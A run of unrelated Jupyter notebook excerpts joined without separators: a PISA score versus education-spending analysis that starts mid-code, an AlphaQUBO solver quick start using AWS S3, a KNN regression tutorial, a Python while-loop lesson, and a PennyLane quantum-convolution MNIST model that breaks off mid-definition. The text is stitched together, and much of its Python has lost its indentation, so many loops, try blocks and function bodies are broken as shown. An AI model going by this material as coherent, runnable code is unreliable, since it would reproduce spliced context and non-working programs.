plt.xticks(fontsize=9)
plt.title('Nota em Ciências')
ax3 = fig.add_subplot(gs[:, 0])
plt.yticks([])
plt.xticks([x/100 for x in range(0,700,50)])
plt.title('Gasto Público em Educação (% do PIB)')
ax0.axes.get_xaxis().get_label().set_visible(False)
ax1.axes.get_xaxis().get_label().set_visible(False)
ax2.axes.get_xaxis().get_label().set_visible(False)
ax0.axes.get_yaxis().get_label().set_visible(False)
ax1.axes.get_yaxis().get_label().set_visible(False)
ax2.axes.get_yaxis().get_label().set_visible(False)
ax3.axes.get_yaxis().get_label().set_visible(False)
# Plotting the distribution charts.
g3 = sns.barplot(data=base_group_country.sort_values('Gasto Educ (%)',ascending=True)[:7],x='Gasto Educ (%)',y='País',
ci=0,ax=ax3,palette=sns.color_palette("OrRd", 10)[3:])
g3.tick_params(axis="y",direction="out", pad=-155,colors='white',labelsize=15)
g0 = sns.barplot(data=base_group_country.sort_values('Nota Matemática',ascending=True)[:5],y='Nota Matemática',x='País',
ax=ax0,palette=sns.color_palette("YlGn", 10)[5:])
g0.tick_params(axis="x",direction="out", pad=-75,colors='white',labelsize=14)
g1 = sns.barplot(data=base_group_country.sort_values('Nota Leitura',ascending=True)[:5],y='Nota Leitura',x='País',
ax=ax1,palette=sns.color_palette("PuBu", 10)[5:])
g1.tick_params(axis="x",direction="out", pad=-75,colors='white',labelsize=14)
g2 = sns.barplot(data=base_group_country.sort_values('Nota Ciências',ascending=True)[:5],y='Nota Ciências',x='País',
ax=ax2,palette=sns.color_palette("YlOrBr", 10)[5:])
g2.tick_params(axis="x",direction="out", pad=-75,colors='white',labelsize=14)
fig.suptitle('Países com Menores Valores',fontsize=20)
plt.show()
# Let's visualize the distributions of these columns.
fig = plt.figure(figsize=(12,6))
# Creating a matplotlib figure canvas
gs = gridspec.GridSpec(3, 2, wspace=0.2, hspace=0.6,figure=fig)
# Creating the subplots (1 large, 3 smaller)
# The code below forces all PISA charts to share the same x-axis.
ax0 = fig.add_subplot(gs[0, 1])
plt.yticks([])
plt.title('Nota em Matemática')
plt.setp(ax0.get_xticklabels(), visible=False)
ax1 = fig.add_subplot(gs[1, 1],sharex=ax0)
plt.yticks([])
plt.title('Nota em Leitura')
plt.setp(ax1.get_xticklabels(), visible=False)
ax2 = fig.add_subplot(gs[2, 1],sharex=ax0)
plt.yticks([])
plt.title('Nota em Ciências')
ax3 = fig.add_subplot(gs[:, 0])
plt.yticks([])
plt.xticks([x/100 for x in range(100,700,50)])
plt.title('Gasto Público em Educação (% do PIB)')
# Plotting the distribution charts.
sns.distplot(base_group['Gasto Educ (%)'],ax=ax3,hist=False,axlabel=False,kde_kws={"shade": True},color='#342d36')
sns.distplot(base_group['Nota Matemática'],ax=ax0,hist=False,axlabel=False,kde_kws={"shade": True},color='#eb8989')
sns.distplot(base_group['Nota Leitura'],ax=ax1,hist=False,kde_kws={"shade": True},axlabel=False)
sns.distplot(base_group['Nota Ciências'],ax=ax2,hist=False,axlabel=False,kde_kws={"shade": True},color='#62e571')
fig.suptitle('Distribuição das Variáveis',fontsize=20)
plt.show()
```
The statistical visualizations show that the score variables behave similarly. Let's check the correlation between them.
```
mask = np.zeros_like(base_group[['Gasto Educ (%)','Nota Leitura','Nota Matemática','Nota Ciências']].corr(), dtype=bool)
mask[np.triu_indices_from(mask)] = True
mask[np.diag_indices_from(mask)] = False
fig, ax = plt.subplots()
sns.heatmap(base_group[['Gasto Educ (%)','Nota Leitura','Nota Matemática','Nota Ciências']].corr(), annot=True,
cmap='Blues',fmt='.2g',linewidths=1,square=False,ax=ax,cbar=False,mask=mask)
cbar = fig.colorbar(ax.get_children()[0],shrink=0.6)
cbar.ax.set_title('Corr. Pearson',fontsize=9,pad=12)
fig.subplots_adjust(left=0.2)
plt.xticks(rotation=20)
plt.title('Mapa de Calor das Correlações entre Variáveis',fontsize=16)
plt.show()
```
Indeed, the columns are strongly correlated. Therefore, from now on, with little loss of generality, we will simplify things by creating a single average-score column.
```
base_group['Nota Média'] = np.mean(base_group[['Nota Leitura','Nota Matemática','Nota Ciências']],axis=1)
# Let's visualize the distributions of these columns.
fig = plt.figure(figsize=(12,6))
# Creating a matplotlib figure canvas
gs = gridspec.GridSpec(3, 2, wspace=0.2, hspace=0.4,figure=fig)
# Creating the subplots (1 large, 3 smaller)
# The code below forces all PISA charts to share the same x-axis.
ax0 = fig.add_subplot(gs[:, 1])
plt.yticks([])
plt.title('Nota Média')
ax3 = fig.add_subplot(gs[:, 0])
plt.yticks([])
plt.xticks([x/100 for x in range(100,700,50)])
plt.title('Gasto Público em Educação (% do PIB)')
# Plotting the distribution charts.
sns.distplot(base_group['Gasto Educ (%)'],ax=ax3,hist=False,axlabel=False,kde_kws={"shade": True},color='#342d36')
sns.distplot(base_group['Nota Média'],ax=ax0,hist=False,axlabel=False,kde_kws={"shade": True},color='#eb8989')
fig.suptitle('Distribuição das Variáveis',fontsize=20)
plt.show()
```
We also notice that the distribution of the average score is bimodal. This indicates that there is more than one reality in the data: although most countries follow the behavior captured by the large peak, the tails contain a second mode, which points to a second group of countries.
One possible reason for this bimodal distribution is the presence of many European countries in the data. As we saw earlier, Europe is the continent with the most records and may therefore be distorting the distributions. Let's analyze the distributions broken down by continent.
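To illustrate why bimodality suggests two groups, a mixture of two different normal distributions produces exactly this kind of shape. The numbers below are synthetic, not the PISA scores:

```python
import numpy as np

rng = np.random.default_rng(0)
# Two hypothetical "realities": most countries near 470, a second group near 540.
group_a = rng.normal(470, 15, size=800)
group_b = rng.normal(540, 10, size=200)
scores = np.concatenate([group_a, group_b])

# A coarse histogram over the combined sample shows two separated peaks (two modes).
counts, edges = np.histogram(scores, bins=12)
print(counts)
```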
```
# Plotting distribution charts broken down by continent.
f,ax = plt.subplots(2,figsize=[10.5,5.5])
sns.violinplot(x="Continente", y="Gasto Educ (%)", data=base_group,
showfliers = False,ax=ax[0])
ax[0].set_xlabel('')
ax[0].set_xticks([])
ax[0].grid(axis='y', ls=':')
ax[1].grid(axis='y', ls=':')
sns.violinplot(x="Continente", y="Nota Média", data=base_group,
showfliers = False,ax=ax[1])
plt.tight_layout()
plt.show()
```
The distribution plots above clearly show that countries live in different realities. In both PISA performance and education spending, Asia stands out for containing two distinct groups: some of its countries invest in education and perform very well, while others do not. The Americas are in a similar situation.
Finally, as the last visualization of this section, we will analyze the variables over time.
```
f,ax = plt.subplots(2,figsize=(12,5),sharex=True)
sns.lineplot(data=base_group[base_group['Ano']<=2015],x='Ano',y='Gasto Educ (%)',ax=ax[1],hue='Continente',ci=0,
legend=False,linewidth=3.5)
sns.lineplot(data=base_group[base_group['Ano']<=2015],x='Ano',y='Nota Média',ax=ax[0],hue='Continente',ci=0,linewidth=3.5)
ax[1].set_xticks([x for x in range(2000,2016)])
ax[1].set_xlabel('')
ax[1].grid(axis='y', ls=':')
ax[0].legend(bbox_to_anchor=(1.05, 0), loc='center left', borderaxespad=0.)
ax[0].grid(axis='y', ls=':')
sns.despine(left=True)
f.suptitle('Evolução da Educação nos Continentes',fontsize=20)
plt.show()
```
We notice that in most continents the share of GDP invested in education grew. Even so, student performance on PISA in those same continents did not keep pace. We suspect that the increase in the GDP share spent on education does not actually represent an increase in real terms. The reason for this suspicion is the sharp jump that occurred across all continents between 2008 and 2009, when the world went through a major financial crisis: GDPs may have shrunk, which would raise the education share even for a fixed level of spending.
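The arithmetic behind this suspicion is simple: holding spending fixed while GDP shrinks raises the spending-to-GDP ratio. The numbers below are purely illustrative:

```python
# Illustrative numbers only -- not taken from the dataset.
spending = 50.0      # education spending, constant in real terms
gdp_2008 = 1000.0
gdp_2009 = 900.0     # GDP contracts during the crisis

share_2008 = 100 * spending / gdp_2008  # 5.0 % of GDP
share_2009 = 100 * spending / gdp_2009  # ~5.56 % of GDP: the share rises with no new spending
print(round(share_2008, 2), round(share_2009, 2))
```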
---
# <font color='#82ad32'>5. Correlation between Public Education Spending and PISA Performance
```
plt.figure(figsize=(12,6))
sns.regplot(data=base_group,x='Gasto Educ (%)',y='Nota Média',color='#82ad32',marker='+',ci=0,
scatter_kws={'alpha':0.75})
plt.title('Gráfico de Dispersão do Gasto em Educação (% do PIB) x Nota Média no PISA',fontsize=16)
plt.show()
```
# AlphaQUBO Quick Start
This quick start shows how to invoke AlphaQUBO in AWS and retrieve the results. We will invoke the QUBO solver with the problem definition in S3 and wait for the solution to be populated in S3.
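As background, a QUBO problem asks for a binary vector x that minimizes the quadratic objective xᵀQx. The tiny matrix below is a hypothetical 2-variable example, not the MQLib instance used later in this notebook:

```python
import numpy as np

# Hypothetical 2-variable QUBO instance; illustrative only.
Q = np.array([[-1.0, 2.0],
              [0.0, -1.0]])

def qubo_energy(Q, x):
    """Return the QUBO objective value x^T Q x for a binary vector x."""
    x = np.asarray(x, dtype=float)
    return float(x @ Q @ x)

# For two variables we can enumerate all four assignments by brute force;
# a solver like AlphaQUBO is needed once the variable count grows.
best = min(((qubo_energy(Q, [a, b]), (a, b))
            for a in (0, 1) for b in (0, 1)), key=lambda t: t[0])
print(best)  # minimum energy is -1.0 for this Q
```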
```
import sys
import time
import meta_analytics
from meta_analytics.api import qubo_api
from meta_analytics.model.solver_api import SolverAPI
from meta_analytics.model.solver_async_request import SolverAsyncRequest
from meta_analytics.model.solver_async_response import SolverAsyncResponse
import boto3
import boto3.session
from botocore.exceptions import ClientError
# Define the location for the API of the AlphaQUBO solver.
# If you are using the ECS configuration provided for CloudFormation, the URL is
# the value of the 'ExternalURL' output parameter of the stack.
configuration = meta_analytics.Configuration(
# host = "<Enter AlphaQUBO URL here.>"
host = "http://forec-Publi-1753ZFGPX8JE3-383765963.us-west-2.elb.amazonaws.com"
)
# We will be using S3 to load the QUBO problems into the solver. The credentials
# for the AWS account can be hard coded in the script. However, it is recommended
# credentials are encoded as described at:
# https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html
#
# The primary reason for removing credentials from this script is security.
s3 = boto3.resource('s3')
s3client = boto3.client('s3')
# Prepare to call the AlphaQUBO API -- this could be condensed to one line, but
# is left separate for clarity.
api_client = meta_analytics.ApiClient(configuration)
api_instance = qubo_api.QuboApi(api_client)
try:
# Heartbeat -- Used to verify the container is running.
# On success, there will be no exception thrown. Under the hood, the heartbeat API
# returns a 200 HTTP response. The expected output from the print statement is
# 'None'
# On failure, an exception is printed
heartbeat_response = api_instance.api_qubo_heartbeat_get()
print (heartbeat_response)
except meta_analytics.ApiException as e:
print("Exception when calling QuboApi->api_qubo_heartbeat_get: %s\n" % e)
# Define where the QUBO problem resides in S3 as well as where the solution should be placed.
# The bucket and key must exist in S3 and be accessible via your credentials.
bucket_name="qubotests"
key_name="qci-mqlib/g000283.txt.gz"
solution_bucket_name="qubotests"
solution_key_name="qci-mqlib/rajesh.g000283.txt.gz.out"
# Ensure the solution bucket/key combination does not already exist
try:
obj = s3.Object(solution_bucket_name, solution_key_name)
delete_response = obj.delete()
except ClientError as e:
print(e)
# Now let's invoke the AlphaQUBO solver with the QUBO definition in S3.
# For clarity, we fill in the SolverAsyncRequest separately from invoking the API.
solver_async_request = SolverAsyncRequest(
bucket_name=bucket_name,
key_name=key_name,
solution_bucket_name=solution_bucket_name,
solution_key_name=solution_key_name,
region="us-west-2",
num_vars=1,
min_max=1,
non_zero=0,
timeout=20,
parameters="",
)
try:
# Use the inputs to locate a file in S3 and solve the QUBO within it.
# The file may be a .txt file or a .gz file.
api_response = api_instance.api_qubo_solve_qubo_async_using_s3_post(solver_async_request=solver_async_request)
print(api_response)
except meta_analytics.ApiException as e:
print("Exception when calling QuboApi->api_qubo_solve_qubo_async_using_s3_post: %s\n" % e)
def get_filesize_if_exists(client, bucket, key):
"""return the key's size if it exist, else None"""
response = client.list_objects_v2(
Bucket=bucket,
Prefix=key,
)
#print(response)
for obj in response.get('Contents', []):
if obj['Key'] == key:
return obj['Size']
print("Waiting for AlphaQUBO to create a solution", end="", flush=True)
solution_size = get_filesize_if_exists(s3client, solution_bucket_name, solution_key_name)
while solution_size is None:
time.sleep(3)
solution_size = get_filesize_if_exists(s3client, solution_bucket_name, solution_key_name)
    print(".", end="", flush=True)
print("Solution found or timeout expired for AlphaQUBO solver.")
try:
    obj = s3.Object(solution_bucket_name, solution_key_name)
    body = obj.get()['Body'].read()
    print(body)
except ClientError as e:
    if e.response['Error']['Code'] == "404":
        print("The object does not exist.")
```
## K Nearest Neighbors (KNN)
This algorithm can be used to solve classification or regression problems; both are forms of supervised learning, although neighbor-based ideas also appear in clustering (unsupervised learning).
For a classification example, see the previous notebook (Precision vs. Recall), where the dataset has an attribute (column) representing a categorical variable (a Factor type in R). This time we will tackle a regression problem.
First we load the libraries and the dataset that will be used.
```
#Loading libraries
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import MinMaxScaler
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neighbors import KNeighborsRegressor
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
from sklearn.metrics import roc_curve
from sklearn.metrics import roc_auc_score
from sklearn.metrics import precision_recall_curve
from sklearn.metrics import auc
from sklearn.metrics.pairwise import manhattan_distances
from sklearn.metrics import mean_squared_error
from math import sqrt
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
```
## Dataset
The dataset we will work with consists only of numeric attributes (whether discrete or continuous). The input (independent) variables are height and age, while the target variable to predict is weight. It is worth noting that the nature of the target variable is what determines whether the learning problem is regression or classification, so a dataset with categorical attributes and a numeric target variable would still be a regression problem.
**NOTE THAT THE LAST ROW CONTAINS AN OBSERVATION WHOSE WEIGHT IS UNKNOWN**
```
# Loading datasets
db = pd.read_csv("datasets/alturas_pesos.csv")
db
```
Next we set aside the observation to be predicted and split the remaining 10 rows into a training set (the first 7 rows) and a test set (the last 3 rows). In this concrete example the split is largely symbolic, since the goal is to show how the algorithm predicts numeric values.
```
prediction = db.iloc[10,:]
data = db.iloc[0:10,:]
train = data.iloc[0:7,:]
test = data.iloc[7:10,:]
x = train['ALTURA']
y = train['EDAD']
labels = train['PESO']
```
If we plot our data we can see how the observations are distributed in the N-dimensional space of attributes (independent variables). The highlighted points represent the test observations whose weight values we want to estimate.
```
fig,ax = plt.subplots()
ax.set_title("ALTURA VS EDAD")
ax.scatter(x,y)
ax.scatter(test['ALTURA'],test['EDAD'])
for i,label in enumerate(labels):
ax.annotate(label, (x[i],y[i]), )
plt.show()
```
## Assumption:
The key assumption of KNN can be summarized as: "observations that are close in feature space have similar target values." This assumption leads us to consider:
1. A distance measure that lets us define "close" by setting a threshold (here, this is controlled through the value of K).
2. A criterion that, given this "radius," inspects the neighbors inside it and determines the target value the query observation should receive.
### 1. Computing the distance from the query point to the other points
The first step is to define a distance measure to quantify how close a point is to its neighbors.
Some commonly used distance measures are the Euclidean distance, the Manhattan distance (the Minkowski distances of order 2 and order 1, respectively), the Hamming distance, and the Jaccard distance (the last two are very useful in Natural Language Processing).
**Euclidean distance (Minkowski distance of order 2)**
$d(\vec{x},\vec{y})~=~\sqrt{\sum_i|x_i-y_i|^2}~=~\left(\sum_i|x_i-y_i|^2\right)^{1\over2}$
**Manhattan distance (Minkowski distance of order 1)**
$d(\vec{x},\vec{y})~=~\sum_i|x_i-y_i|~=~\sum_i(|x_i-y_i|)^{1\over1}$
**Hamming distance (for categorical variables)**
$d(\vec{x},\vec{y})~=~\sum_i{h_i}$
where $~h_i=0~$ if $~x_i=y_i~$ and $~h_i=1~$ if $~x_i\neq y_i~$
**Jaccard distance (for categorical variables, words, or sets; it can be applied to vectors or sets of different sizes)**
$d(X,Y)~=~1-\frac{|X\cap Y|}{|X\cup Y|}$
Next we compute the first two of these distances to apply the algorithm and note their differences. (Can the last two distances be computed on this dataset? If not, could you transform the data so that they could?)
```
train_input = train.iloc[:,0:2].to_numpy()
test_input = test.iloc[0,0:2].to_numpy().reshape(1,-1)
dist_eucl = [np.linalg.norm(test_input-train_point) for train_point in train_input]
dist_manh = manhattan_distances(test_input,train_input)[0]
df = pd.DataFrame(list(zip(dist_eucl, dist_manh)),
columns =['EUCLIDEAN', 'MANHATTAN'])
df.describe()
```
## Now that the distances are computed, how do we choose the value of K?
To choose the optimal value of K we can use the error obtained on the test set, picking the K that yields the smallest value. We will apply the algorithm for several values of K and select the one that minimizes the test-set error.
```
x_train = train.drop('PESO', axis=1)
y_train = train['PESO']
x_test = test.drop('PESO', axis=1)
y_test = test['PESO']
scaler = MinMaxScaler(feature_range=(0, 1))
x_train_scaled = scaler.fit_transform(x_train)
x_train = pd.DataFrame(x_train_scaled)
x_test_scaled = scaler.transform(x_test)  # reuse the scaler fitted on the training data
x_test = pd.DataFrame(x_test_scaled)
rmse_val = [] #to store rmse values for different k
for K in range(7):
K = K+1
model = KNeighborsRegressor(n_neighbors = K)
model.fit(x_train, y_train) # fit the model
pred=model.predict(x_test) # make prediction on test set
    error = sqrt(mean_squared_error(y_test,pred)) # calculate RMSE (Root Mean Squared Error)
rmse_val.append(error) #store RMSE
print('RMSE value for k= ' , K , 'is:', error)
curve = pd.DataFrame(rmse_val) #elbow curve
curve.plot()
```
Based on the plot above we can conclude that the value of K that minimizes the RMSE is K = 3. We now build the model for this K and predict the missing observation from the original dataset.
```
prediction
model = KNeighborsRegressor(n_neighbors = 3)
model.fit(data.iloc[:,0:2],data.iloc[:,2])# Data not rescaled
model.predict(prediction[0:2].to_numpy().reshape(1,-1))
```
Recalling the original data, for a person 5.50 ft tall and 38 years old, the estimated weight would be 63.67 kg.
```
db
```
## How does KNN predict (numeric variable) or classify (categorical variable)?
In a regression problem, KNN takes the target values of the K nearest neighbors and assigns the new observation their average.
**NOTE: We could use the median instead of the mean, depending on the distribution of the K values considered.**
In a classification problem, KNN assigns the target category by majority vote: it takes the mode of the categories to which the K nearest neighbors belong.
Now, thinking about the problem presented above, would it be worth considering other regression or estimation methods?
Classical linear regression provides a method against which to contrast the previous model's results. Recall that we obtained an RMSE for K = 3; we could compute the RMSE of a classical linear regression model and see which one is smaller. We will cover that method in a following notebook.
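The averaging and voting rules described above can be sketched by hand. The neighbor values below are hypothetical, not taken from the dataset:

```python
import numpy as np
from collections import Counter

# Hypothetical target values of the K = 3 nearest neighbors.
neighbor_weights = np.array([60.0, 64.0, 67.0])

# Regression: average of the K targets (or the median, for skewed neighborhoods).
pred_mean = neighbor_weights.mean()        # ~63.67
pred_median = np.median(neighbor_weights)  # 64.0

# Classification: the mode (majority vote) of the K neighbors' labels.
neighbor_labels = ['heavy', 'light', 'heavy']
pred_label = Counter(neighbor_labels).most_common(1)[0][0]  # 'heavy'

print(round(pred_mean, 2), pred_median, pred_label)
```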
## User Input and While Loops
Most programs are written to solve an end user’s problem. To do so, you usually need to get some information from the user.
### How the input() Function Works
The `input()` built-in function pauses your program and waits for the user to enter some text.
When you use the `input()` function, Python interprets everything the user enters as a string.
```
message = input("Tell me something, and I will repeat it back to you: ")
print(message + " type:" + str(type(message)))
```
### Using int() to Accept Numerical Input
```
height = input("How tall are you, in inches? ")
height = int(height)
if height >= 36:
print("\nYou're tall enough to ride!")
else:
print("\nYou'll be able to ride when you're a little older.")
```
### Introducing while Loops
```
current_number = 1
while current_number <= 5:
print(current_number, end=" ")
current_number += 1
```
### Letting the User Choose When to Quit
```
prompt = "\nTell me something, and I will repeat it back to you:"
prompt += "\nEnter 'quit' to end the program. "
message = ""
while message != 'quit':
message = input(prompt)
if message != 'quit':
print(message)
```
### Using a Flag
For a program that should run only as long as many conditions are true, you can define one variable that determines whether or not the entire program is active. This variable, called a flag, acts as a signal to the program. We can write our programs so they run while the flag is set to True and stop running when any of several events sets the value of the flag to False.
As a result, our overall while statement needs to check only one condition: whether or not the flag is currently True.
```
prompt = "\nTell me something, and I will repeat it back to you:"
prompt += "\nEnter 'quit' to end the program. "
active = True
while active:
message = input(prompt)
if message == 'quit':
active = False
else:
print(message)
```
### Using break to Exit a Loop
To exit a while loop immediately without running any remaining code in the loop, regardless of the results of any conditional test, use the break statement.
You can use the break statement in any of Python’s loops. For example, you could use break to quit a for loop that’s working through a list or a dictionary.
```
prompt = "\nPlease enter the name of a city you have visited:"
prompt += "\n(Enter 'quit' when you are finished.) "
while True:
city = input(prompt)
if city == 'quit':
break
else:
print("I'd love to go to " + city.title() + "!")
```
### Using continue in a Loop
You can use the continue statement to return to the beginning of the loop based on the result of a conditional test.
```
current_number = 0
while current_number < 10:
current_number += 1
if current_number % 2 == 0:
continue
print(current_number)
```
## Using a while Loop with Lists and Dictionaries
A for loop is effective for looping through a list, but you shouldn't modify a list inside a for loop, because Python will have trouble keeping track of the items in the list.
To modify a list as you work through it, use a while loop.
Using while loops with lists and dictionaries allows you to collect, store, and organize lots of input to examine and report on later.
```
# Start with users that need to be verified,
# and an empty list to hold confirmed users.
unconfirmed_users = ['alice', 'brian', 'candace']
confirmed_users = []
# Verify each user until there are no more unconfirmed users.
# Move each verified user into the list of confirmed users.
while unconfirmed_users:
current_user = unconfirmed_users.pop()
print("Verifying user: " + current_user.title())
confirmed_users.append(current_user)
# Display all confirmed users.
print("\nThe following users have been confirmed:")
for confirmed_user in confirmed_users:
print(confirmed_user.title())
```
### Removing All Instances of Specific Values from a List
The remove() method searches for the given element in the list and removes the first matching element.
```
pets = ['dog', 'cat', 'dog', 'goldfish', 'cat', 'rabbit', 'cat']
print(pets)
while 'cat' in pets:
pets.remove('cat')
print(pets)
```
### Filling a Dictionary with User Input
```
responses = {}
# Set a flag to indicate that polling is active.
polling_active = True
while polling_active:
# Prompt for the person's name and response.
name = input("\nWhat is your name? ")
response = input("Which mountain would you like to climb someday? ")
# Store the response in the dictionary:
responses[name] = response
# Find out if anyone else is going to take the poll.
repeat = input("Would you like to let another person respond? (yes/ no) ")
if repeat == 'no':
polling_active = False
# Polling is complete. Show the results.
print("\n--- Poll Results ---")
for name, response in responses.items():
print(name + " would like to climb " + response + ".")
```
## Try it Yourself
**1. Multiples of Ten**
Ask the user for a number, and then report whether the number is a multiple of 10 or not.
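One possible solution sketch (the function name is our own choice; with real user input you would read the number via `input()`):

```python
def report_multiple_of_ten(number):
    """Return a message saying whether number is a multiple of 10."""
    if number % 10 == 0:
        return str(number) + " is a multiple of 10."
    return str(number) + " is not a multiple of 10."

# With user input this would be: number = int(input("Enter a number: "))
print(report_multiple_of_ten(70))   # 70 is a multiple of 10.
print(report_multiple_of_ten(23))   # 23 is not a multiple of 10.
```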
**2. Deli**
Make a list called sandwich_orders and fill it with the names of various sandwiches. Then make an empty list called finished_sandwiches. Loop through the list of sandwich orders and print a message for each order, such as I made your tuna sandwich. As each sandwich is made, move it to the list of finished sandwiches.
After all the sandwiches have been made, print a message listing each sandwich that was made.
**3. No Pastrami**
Using the list sandwich_orders from the previous exercise, make sure the sandwich 'pastrami' appears in the list at least three times. Add code near the beginning of your program to print a message saying the deli has run out of pastrami, and then use a while loop to remove all occurrences of 'pastrami' from sandwich_orders.
Make sure no pastrami sandwiches end up in finished_sandwiches.
```
# %matplotlib inline
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
import numpy as np
import tensorflow as tf
from tensorflow.keras.utils import to_categorical
```
# Loading Raw Data
```
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()
x_train = x_train[:, 0:27, 0:27]
x_test = x_test[:, 0:27, 0:27]
x_train_flatten = x_train.reshape(x_train.shape[0], x_train.shape[1]*x_train.shape[2])/255.0
x_test_flatten = x_test.reshape(x_test.shape[0], x_test.shape[1]*x_test.shape[2])/255.0
print(x_train_flatten.shape, y_train.shape)
print(x_test_flatten.shape, y_test.shape)
x_train_0 = x_train_flatten[y_train == 0]
x_train_1 = x_train_flatten[y_train == 1]
x_train_2 = x_train_flatten[y_train == 2]
x_train_3 = x_train_flatten[y_train == 3]
x_train_4 = x_train_flatten[y_train == 4]
x_train_5 = x_train_flatten[y_train == 5]
x_train_6 = x_train_flatten[y_train == 6]
x_train_7 = x_train_flatten[y_train == 7]
x_train_8 = x_train_flatten[y_train == 8]
x_train_9 = x_train_flatten[y_train == 9]
x_train_list = [x_train_0, x_train_1, x_train_2, x_train_3, x_train_4, x_train_5, x_train_6, x_train_7, x_train_8, x_train_9]
print(x_train_0.shape)
print(x_train_1.shape)
print(x_train_2.shape)
print(x_train_3.shape)
print(x_train_4.shape)
print(x_train_5.shape)
print(x_train_6.shape)
print(x_train_7.shape)
print(x_train_8.shape)
print(x_train_9.shape)
x_test_0 = x_test_flatten[y_test == 0]
x_test_1 = x_test_flatten[y_test == 1]
x_test_2 = x_test_flatten[y_test == 2]
x_test_3 = x_test_flatten[y_test == 3]
x_test_4 = x_test_flatten[y_test == 4]
x_test_5 = x_test_flatten[y_test == 5]
x_test_6 = x_test_flatten[y_test == 6]
x_test_7 = x_test_flatten[y_test == 7]
x_test_8 = x_test_flatten[y_test == 8]
x_test_9 = x_test_flatten[y_test == 9]
x_test_list = [x_test_0, x_test_1, x_test_2, x_test_3, x_test_4, x_test_5, x_test_6, x_test_7, x_test_8, x_test_9]
print(x_test_0.shape)
print(x_test_1.shape)
print(x_test_2.shape)
print(x_test_3.shape)
print(x_test_4.shape)
print(x_test_5.shape)
print(x_test_6.shape)
print(x_test_7.shape)
print(x_test_8.shape)
print(x_test_9.shape)
```
# Selecting the dataset
Output: X_train, Y_train, X_test, Y_test
```
n_train_sample_per_class = 200
n_class = 4
X_train = x_train_list[0][:n_train_sample_per_class, :]
Y_train = np.zeros((X_train.shape[0]*n_class,), dtype=int)
for i in range(n_class-1):
X_train = np.concatenate((X_train, x_train_list[i+1][:n_train_sample_per_class, :]), axis=0)
Y_train[(i+1)*n_train_sample_per_class:(i+2)*n_train_sample_per_class] = i+1
X_train.shape, Y_train.shape
n_test_sample_per_class = int(0.25*n_train_sample_per_class)
X_test = x_test_list[0][:n_test_sample_per_class, :]
Y_test = np.zeros((X_test.shape[0]*n_class,), dtype=int)
for i in range(n_class-1):
X_test = np.concatenate((X_test, x_test_list[i+1][:n_test_sample_per_class, :]), axis=0)
Y_test[(i+1)*n_test_sample_per_class:(i+2)*n_test_sample_per_class] = i+1
X_test.shape, Y_test.shape
```
# Dataset Preprocessing
```
X_train = X_train.reshape(X_train.shape[0], 27, 27)
X_test = X_test.reshape(X_test.shape[0], 27, 27)
X_train.shape, X_test.shape
Y_train = to_categorical(Y_train)
Y_test = to_categorical(Y_test)
```
# Quantum
```
import pennylane as qml
from pennylane import numpy as np
from pennylane.optimize import AdamOptimizer, GradientDescentOptimizer
qml.enable_tape()
from tensorflow.keras.utils import to_categorical
# Set a random seed
np.random.seed(2020)
# Define output labels as quantum state vectors
def density_matrix(state):
"""Calculates the density matrix representation of a state.
Args:
state (array[complex]): array representing a quantum state vector
Returns:
dm: (array[complex]): array representing the density matrix
"""
return state * np.conj(state).T
label_0 = [[1], [0]]
label_1 = [[0], [1]]
state_labels = [label_0, label_1]
n_qubits = n_class
dev_fc = qml.device("default.qubit", wires=n_qubits)
@qml.qnode(dev_fc)
def q_fc(params, inputs):
"""A variational quantum circuit representing the DRC.
Args:
params (array[float]): array of parameters
inputs = [x, y]
x (array[float]): 1-d input vector
y (array[float]): single output state density matrix
Returns:
float: fidelity between output state and input
"""
# layer iteration
for l in range(len(params[0])):
# qubit iteration
for q in range(n_qubits):
# gate iteration
for g in range(int(len(inputs)/3)):
qml.Rot(*(params[0][l][q][3*g:3*(g+1)] * inputs[3*g:3*(g+1)] + params[1][l][q][3*g:3*(g+1)]), wires=q)
return [qml.expval(qml.Hermitian(density_matrix(state_labels[0]), wires=[i])) for i in range(n_qubits)]
dev_conv = qml.device("default.qubit", wires=9)
@qml.qnode(dev_conv)
def q_conv(conv_params, inputs):
"""A variational quantum circuit representing the Universal classifier + Conv.
Args:
params (array[float]): array of parameters
x (array[float]): 2-d input vector
y (array[float]): single output state density matrix
Returns:
float: fidelity between output state and input
"""
# layer iteration
for l in range(len(conv_params[0])):
# RY layer
# height iteration
for i in range(3):
# width iteration
for j in range(3):
qml.RY((conv_params[0][l][3*i+j] * inputs[i, j] + conv_params[1][l][3*i+j]), wires=(3*i+j))
# entangling layer
for i in range(9):
if i != (9-1):
qml.CNOT(wires=[i, i+1])
return qml.expval(qml.PauliZ(0) @ qml.PauliZ(1) @ qml.PauliZ(2) @ qml.PauliZ(3) @ qml.PauliZ(4) @ qml.PauliZ(5) @ qml.PauliZ(6) @ qml.PauliZ(7) @ qml.PauliZ(8))
a = np.zeros((2, 1, 9))
q_conv(a, X_train[0, 0:3, 0:3])
a = np.zeros((2, 1, n_class, 9))
q_fc(a, X_train[0, 0, 0:9])
class class_weights(tf.keras.layers.Layer):
def __init__(self):
super(class_weights, self).__init__()
w_init = tf.random_normal_initializer()
self.w = tf.Variable(
initial_value=w_init(shape=(1, n_class), dtype="float32"),
trainable=True,
)
def call(self, inputs):
return (inputs * self.w)
# Input image, size = 27 x 27
X = tf.keras.Input(shape=(27,27), name='Input_Layer')
# Specs for Conv
c_filter = 3
c_strides = 2
# First Quantum Conv Layer, trainable params = 18*L, output size = 13 x 13
num_conv_layer_1 = 2
q_conv_layer_1 = qml.qnn.KerasLayer(q_conv, {"conv_params": (2, num_conv_layer_1, 9)}, output_dim=(1), name='Quantum_Conv_Layer_1')
size_1 = int(1+(X.shape[1]-c_filter)/c_strides)
q_conv_layer_1_list = []
# height iteration
for i in range(size_1):
# width iteration
for j in range(size_1):
temp = q_conv_layer_1(X[:, 2*i:2*(i+1)+1, 2*j:2*(j+1)+1])
temp = tf.keras.layers.Reshape((1,))(temp)
q_conv_layer_1_list += [temp]
concat_layer_1 = tf.keras.layers.Concatenate(axis=1)(q_conv_layer_1_list)
reshape_layer_1 = tf.keras.layers.Reshape((size_1, size_1))(concat_layer_1)
